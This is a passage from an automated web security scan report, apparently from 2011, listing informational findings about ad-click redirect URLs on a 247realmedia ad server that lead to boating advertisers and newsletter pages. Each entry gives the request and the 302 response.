Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.338. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.339. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.340. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:16:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.341. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.342. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.343. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.344. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.345. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.346. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.347. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.348. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.349. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.350. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.351. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

